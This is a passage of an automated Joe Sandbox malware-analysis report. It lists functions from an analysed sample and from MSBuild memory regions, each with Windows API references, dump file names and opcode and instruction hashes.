                      • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADDD
                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67DCB64B1), ref: 00007FF67DCBADF1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ErrorLastMultipleWait$HandlesObjects
                      • String ID:
                      • API String ID: 2817213684-0
                      • Opcode ID: 575de51f3a294162dbf1c67d8ac1e5a7a5c8a811859f7b76b171d201c058d2a6
                      • Instruction ID: a423ff3e0060f260f81b413a1fd5ec1253126d8b440626a8250d35102c9882af
                      • Opcode Fuzzy Hash: 575de51f3a294162dbf1c67d8ac1e5a7a5c8a811859f7b76b171d201c058d2a6
                      • Instruction Fuzzy Hash: FC11863261C695C2D7244B26B90112AB275FB44790F540A39EACEC3BE4EF7CD4518B40
                      APIs
                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DD19AEB), ref: 00007FF67DD1A9B0
                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DD19AEB), ref: 00007FF67DD1A9F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFileHeaderRaise
                      • String ID: csm
                      • API String ID: 2573137834-1018135373
                      • Opcode ID: fe138634e94c212e63ee4562904113ca92d362cfbe7d1a7eb52c3d5f96bd5a35
                      • Instruction ID: e8050cd6e112c753c3564625e977469454fdc31a29cd857d3d4b393fa3cc250d
                      • Opcode Fuzzy Hash: fe138634e94c212e63ee4562904113ca92d362cfbe7d1a7eb52c3d5f96bd5a35
                      • Instruction Fuzzy Hash: 2D111C32628B8182EB218B25F94026977E5FB88B84F5A5730DECD47B58EF3DD5918700
                      APIs
                      • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE176A
                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE17D9
                      • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE1822
                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF67DCCD596,?,-8000000000000000,00000001,00007FF67DCDC756), ref: 00007FF67DCE1838
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave
                      • String ID:
                      • API String ID: 3168844106-0
                      • Opcode ID: 22853f26e13af6e76a51d98bdc700caa82f9067d7e59c60d265fa02c72d7c76d
                      • Instruction ID: ff75affe2b9ea5c4a6e1d6d09f59cfbab2c1953f9576c255f82262832d2d4d65
                      • Opcode Fuzzy Hash: 22853f26e13af6e76a51d98bdc700caa82f9067d7e59c60d265fa02c72d7c76d
                      • Instruction Fuzzy Hash: C5517173A28A9281E6208F25FC413746368FF55B84F450B32DA5DC3695EF3CE566C310
                      APIs
                      • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3EDA
                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F1C
                      • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F47
                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67DCD400F,?,?,?,00007FF67DCE02DA), ref: 00007FF67DCD3F68
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave
                      • String ID:
                      • API String ID: 3168844106-0
                      • Opcode ID: 7b5c5380cd48388d178edce08a48c3bc068cb183a837e845f076f16a9dd0c5c9
                      • Instruction ID: a1ae6e6aa65cc87703f2e1f024862b95c4d4d51aaf3ed16c8e3b1bb0509cf2db
                      • Opcode Fuzzy Hash: 7b5c5380cd48388d178edce08a48c3bc068cb183a837e845f076f16a9dd0c5c9
                      • Instruction Fuzzy Hash: 7C213B23A3998681EA509B38FC403B82364EF443A0F990B32D52CC26E5FF6CE496C301
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bbae59ee52dbb673bdfa29889f32180ce8657ac2f6fbd5041108282215fa6f65
                      • Instruction ID: 979dfbbad6efc34fe3d4d5a813b8d44e6119fc6652ce8dd0464392e8e1827832
                      • Opcode Fuzzy Hash: bbae59ee52dbb673bdfa29889f32180ce8657ac2f6fbd5041108282215fa6f65
                      • Instruction Fuzzy Hash: BCF0F6317052856FD746A778ACA09777BBBEFCB610B0904BAE449CB356C9254C0AC7A4
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f1f0bbf3180b8ed5b0c0cf097d12ecad9b8ab06f4920d03afd1f5d691f466bad
                      • Instruction ID: c52f3925282cc1b6c61e60f0786c78aa9ade4e9f70a49a1e253af060b522e2f2
                      • Opcode Fuzzy Hash: f1f0bbf3180b8ed5b0c0cf097d12ecad9b8ab06f4920d03afd1f5d691f466bad
                      • Instruction Fuzzy Hash: 4D416B34A0020A8FDB15EB78D5947AEBBF2BFC8310F188569D416AB395DB31DC42CB90
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79d7f46a307cbf016eed94528ab3e5b5927ea8d56f8a78316fa2cc57909b907c
                      • Instruction ID: e21187725c326fa0189e11c0fa43c375591e7ae7823ef31013f907a358fa9150
                      • Opcode Fuzzy Hash: 79d7f46a307cbf016eed94528ab3e5b5927ea8d56f8a78316fa2cc57909b907c
                      • Instruction Fuzzy Hash: 06416B34A002098FDB15EB78D5946AEBBF2BBC8310F288569D415AB395DB31EC41CB91
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f8a2be95d99c8d0c8694f23038d841e0faba61aa2b3dda098987de07f015e36
                      • Instruction ID: fbfe45a1a0b8117a5a4a0e90ecfcceb2f127209a826408934eaf6a2ae4ca811c
                      • Opcode Fuzzy Hash: 7f8a2be95d99c8d0c8694f23038d841e0faba61aa2b3dda098987de07f015e36
                      • Instruction Fuzzy Hash: A8212026A093A58FDB479B7888647EE7F71BFC2614F19019ED080EF2E3C6248905C7D1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4622817312.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_124d000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9743c81aae34cb20f1237373f34322a8cc70990ae2f808d37681dc20b7a7b4d5
                      • Instruction ID: 1c82d9b90d17017b83a0896fff1dee576539ab1bcc9d35e1e8f4dd4dbe3f462e
                      • Opcode Fuzzy Hash: 9743c81aae34cb20f1237373f34322a8cc70990ae2f808d37681dc20b7a7b4d5
                      • Instruction Fuzzy Hash: 42216771510208DFDB09DF88E9C0F16BF65FB98318F2481ACEA0A0B256C776D456CBE2
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f6ddf0e9b89aee61b0d51497d393efbfdbe313b08fc5f1e7102739f7dfacc990
                      • Instruction ID: 9f58c65b473ca55d6f187e0b1509454ae298eb0c399e224f4ff37b42b52c5710
                      • Opcode Fuzzy Hash: f6ddf0e9b89aee61b0d51497d393efbfdbe313b08fc5f1e7102739f7dfacc990
                      • Instruction Fuzzy Hash: 76213631B0021ACBDB58EB69C46477EB7A2BBC8644F144969E106EF3E5CF348E0287D5
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 11c46f383d84750995c77fb1fa81512c48457d489a9e9b390291d85b3b917c94
                      • Instruction ID: e926577943db607aa745234e554ec99190c325e6a3d448bf6be338c175bb34ee
                      • Opcode Fuzzy Hash: 11c46f383d84750995c77fb1fa81512c48457d489a9e9b390291d85b3b917c94
                      • Instruction Fuzzy Hash: 45114731B0021ACBDB58EB69C46463E77A2BBC8740F144968E106EF3E5CF348D0287D5
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7aa0761481bb5a9b4e602d6419c15a653f4efc1d218c37aa1f4f8ee85ea99a22
                      • Instruction ID: 7d7b45cdf18ee642b04ae4635504e59e795443bdcec86642d9cc272c660702da
                      • Opcode Fuzzy Hash: 7aa0761481bb5a9b4e602d6419c15a653f4efc1d218c37aa1f4f8ee85ea99a22
                      • Instruction Fuzzy Hash: EA115B31B0022ACBDB48EB69C46467E73A2BBD8744F144969E506EF3E1CF348D0287D5
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d398d1a45c4eeac1a3145dc8275bff1218344aa76e75dcba590d59c7236cd8c
                      • Instruction ID: 9972a30d5df471d7b40db42f38ace3bf8edb6a239f2efba203d666417ff2e215
                      • Opcode Fuzzy Hash: 9d398d1a45c4eeac1a3145dc8275bff1218344aa76e75dcba590d59c7236cd8c
                      • Instruction Fuzzy Hash: 641126717083825FC306A738ADA999F7BF6EFC2250348856ED045CF256EE24DD058391
                      Memory Dump Source
                      • Source File: 00000007.00000002.4622817312.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_124d000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                      • Instruction ID: 8a1b786cfe7acbc31f7f6a79bc1933a1938a5ef8b517ff4fde2e1708118c4179
                      • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                      • Instruction Fuzzy Hash: 0611E172404244CFCB16CF44D5C0B16BF71FB94314F2482A9E9090B257C33AD45ACBA1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc9859ccc0fb3a5f736575211c3caf66d2aded6c509555f39e783f21b582d65d
                      • Instruction ID: 634c6ae63439bf295be43041f547b0c9928d724a7bdc088ae4ff37076cf33377
                      • Opcode Fuzzy Hash: dc9859ccc0fb3a5f736575211c3caf66d2aded6c509555f39e783f21b582d65d
                      • Instruction Fuzzy Hash: 4C011E35B003198BDB54AB69C8687BEB7A6BBC8700F144568E402BB3D5DF745D018BD1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2cd336c9ca144aa866a0223608191d74a9c2fe8e5c254b69f841e44874ea1ecf
                      • Instruction ID: 100e3fd3646be31d5cda22beb2a83d83620a8821247cfa1d522f744f6d805528
                      • Opcode Fuzzy Hash: 2cd336c9ca144aa866a0223608191d74a9c2fe8e5c254b69f841e44874ea1ecf
                      • Instruction Fuzzy Hash: 16F0AF71B002066BD71AB67AE8A996F77DAFBC4290380463DE509CB308EE70EC0187D0
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2179a0bdab173520a7f2d1704fc89d75ac79b234b7ec920dd4277ea19f501e3
                      • Instruction ID: 0165e460f30bfba3fa84adc4eaee6a006ac253a9c195baa513aaba556bfa666a
                      • Opcode Fuzzy Hash: b2179a0bdab173520a7f2d1704fc89d75ac79b234b7ec920dd4277ea19f501e3
                      • Instruction Fuzzy Hash: E60181357006068BDB16EB78E5906ADB3E3BFC8310B188529C5169F355DF71EC068B91
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 951db9fdb66c0304ec49469a8f5a42180b27269aabe869704159fb1bde3767b3
                      • Instruction ID: b83a246c12fcf27fac54eff1902eba321af3f018ce676425398deaeb0af5cab2
                      • Opcode Fuzzy Hash: 951db9fdb66c0304ec49469a8f5a42180b27269aabe869704159fb1bde3767b3
                      • Instruction Fuzzy Hash: C6F068315047829BC3199779D82047E7BE6AEC626070886AEC54ADF651EE259C0587D1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b6379029e0d0b9f34de29f7e40d2e830610e78e27619c11c743183c020f786cd
                      • Instruction ID: 7484a45a62f39ba07516482e7230a9c13423f665e06eaf21c575ef71db2a1d24
                      • Opcode Fuzzy Hash: b6379029e0d0b9f34de29f7e40d2e830610e78e27619c11c743183c020f786cd
                      • Instruction Fuzzy Hash: EAF01931A1021ACBDB54AB69C46477EB7A2BBC8744F244929E102AF3E1CB7489018BD5
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0ef720f890794db7e78344c6ad5171de6efcd1b617a252d6f352c596821adc5
                      • Instruction ID: 2eaf5523d2716870e65105d81d7973f301473860f0aabc59732b3f51e76a91c9
                      • Opcode Fuzzy Hash: a0ef720f890794db7e78344c6ad5171de6efcd1b617a252d6f352c596821adc5
                      • Instruction Fuzzy Hash: 5CE02B303052656FC34266AC98609AB37AAEFC63607050076E448CB382DD240C0643E1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d699b6187b04b07781dad0867c0d47de5d20ad14111c40c6673b3013ec842ce0
                      • Instruction ID: 05f279eb9ea1e1760e3846f2220c6384cd9cb1393f942336678cd39e7fd653e8
                      • Opcode Fuzzy Hash: d699b6187b04b07781dad0867c0d47de5d20ad14111c40c6673b3013ec842ce0
                      • Instruction Fuzzy Hash: 0FE0D8333111985FD7072268A92457B3A6BEBC9612B090177F549C7395DD258D0693E1
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f219974645d3ba6e5fe1b61324ea55401c70faaf79c6a7ead461411a52e0be2
                      • Instruction ID: 69034993f0c822006637c5869c01cee77cc811aaf8ec02fa735fd7fd16a6f06a
                      • Opcode Fuzzy Hash: 1f219974645d3ba6e5fe1b61324ea55401c70faaf79c6a7ead461411a52e0be2
                      • Instruction Fuzzy Hash: 62F0A07081A356AFC702DBB8E8A19CEBFB4EF46300F0540EED444D7152E6350E04D792
                      Memory Dump Source
                      • Source File: 00000007.00000002.4623098566.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_1530000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 57bfd1e614cd7a3afbca8b64dcadf792430891994093ad343f8100f0e35af1d3
                      • Instruction ID: 751f07b3a5a6ca03d1cd7085eac06e1e7e76480804451c45e9ae98fb574c33a4
                      • Opcode Fuzzy Hash: 57bfd1e614cd7a3afbca8b64dcadf792430891994093ad343f8100f0e35af1d3
                      • Instruction Fuzzy Hash: 4BD05E70A1121EEFCB44EFB8E95199DF7F9EB44300B5041ADD808E3200EA322F00AB80